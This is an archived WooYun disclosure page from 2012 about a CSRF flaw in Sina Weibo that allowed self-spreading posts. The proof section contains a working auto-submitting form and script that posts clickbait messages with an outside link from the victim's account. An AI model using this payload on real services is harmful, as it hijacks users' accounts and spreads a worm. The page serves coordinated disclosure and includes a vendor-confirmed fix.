新浪微博可导致大面积病毒传播漏洞

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-05032

漏洞标题：新浪微博可导致大面积病毒传播漏洞

漏洞作者： songlv

提交时间：2012-03-05 12:10

修复时间：2012-04-19 12:11

公开时间：2012-04-19 12:11

漏洞类型：CSRF

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2012-03-05：细节已通知厂商并且等待厂商处理中
2012-03-05：厂商已经确认，细节仅向厂商公开
2012-03-15：细节向核心白帽子及相关领域专家公开
2012-03-25：细节向普通白帽子公开
2012-04-04：细节向实习白帽子公开
2012-04-19：细节向公众公开

简要描述：

顺便结合之前发的自动加关注漏洞,完美结合!

详细说明：

微数据发微博缺少来源验证

漏洞证明：

看看这个微博 http://weibo.com/1829851507/y8ohe17Ct 可试下威力,记得试过了赶快删除微博,以免传播开...

<form action="http://data.weibo.com/mydata/ajax/post" method="post"  id="f2" target="ifr2">
<input name="text" id="updatemsg" value="">
<input name="picid" value="6d115173jw1dqo6buv5r0j">
<input name="pic" value="http://ww1.sinaimg.cn/large/6d115173jw1dqo6buv5r0j.jpg">
<input  type="submit">
</form>
<iframe id="ifr2" name="ifr2"></iframe>
<script>
function rand_msg(){
	var url = '   http://weibonews.sinaapp.com/data.php?id=' + new Date().getTime();
	var msgs = [
		'晒一个90后男生的惊人结婚帐:',
		'怀二胎PP想尽办法逼我生儿子:',
		'明星成名前的卑微职业曝光:',
		'户籍制度改革终于艰难起步:',
		'白静被杀，盘点因情变酿成悲剧的明星们(图):',
		'终于曝光：朝鲜战争中被埋没了50年的惊人真相：',
		'主席一句话：周总理惊呆了，尼克松心服了 ：'];
	var msg = msgs[Math.floor(Math.random()*msgs.length)] + url;
	return msg;
}
function update(msg){
	document.getElementById('updatemsg').value=encodeURIComponent(rand_msg()) 
	document.getElementById('f2').submit();
}
update(rand_msg());
</script>

修复方案：

1.加来源限制
2.加是否是ajax判断

版权声明：转载请注明来源 songlv@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2012-03-05 09:57

厂商回复：

感谢提供，马上修复

漏洞评价：

2012-03-04 23:51 | lyon ( 路人 | Rank:10 漏洞数:3 | HackerTop)

强势～～围观，这个很有。。深度～～｀～
2012-03-05 00:38 | Rookie ( 普通白帽子 | Rank:288 漏洞数:78 | 123)

围观
2012-03-05 00:46 | Z-0ne ( 普通白帽子 | Rank:559 漏洞数:38 | 目前专注于工控安全基础研究，工业数据采集...)

有点意思。。。。
2012-03-05 01:14 | popok ( 普通白帽子 | Rank:117 漏洞数:24 | nothing)

这种通过其他页面内嵌表单，用script执行submit，应该算是正常功能利用吧？算CSRF。。。。哎，无奈哦
2012-03-05 09:12 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

@popok 算，留意域名。
2012-03-05 10:45 | 路人乙 ( 普通白帽子 | Rank:147 漏洞数:29 | 中国移动不厚道，说给礼品也不给！)

蠕虫
2012-03-05 10:48 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

2012-04-19：细节向公众公开@xsser 我穿越了？？？
2012-03-05 10:50 | zeracker ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

@horseluke 天啦。4月了。穿越了！
2012-04-18 22:27 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

!

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-05032

漏洞标题：新浪微博可导致大面积病毒传播漏洞

相关厂商：新浪

漏洞作者： songlv

提交时间：2012-03-05 12:10

修复时间：2012-04-19 12:11

公开时间：2012-04-19 12:11

漏洞类型：CSRF

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 songlv@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-05032

漏洞标题：新浪微博可导致大面积病毒传播漏洞

相关厂商：新浪

漏洞作者： songlv

提交时间：2012-03-05 12:10

修复时间：2012-04-19 12:11

公开时间：2012-04-19 12:11

漏洞类型：CSRF

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2012-05032"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 songlv@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：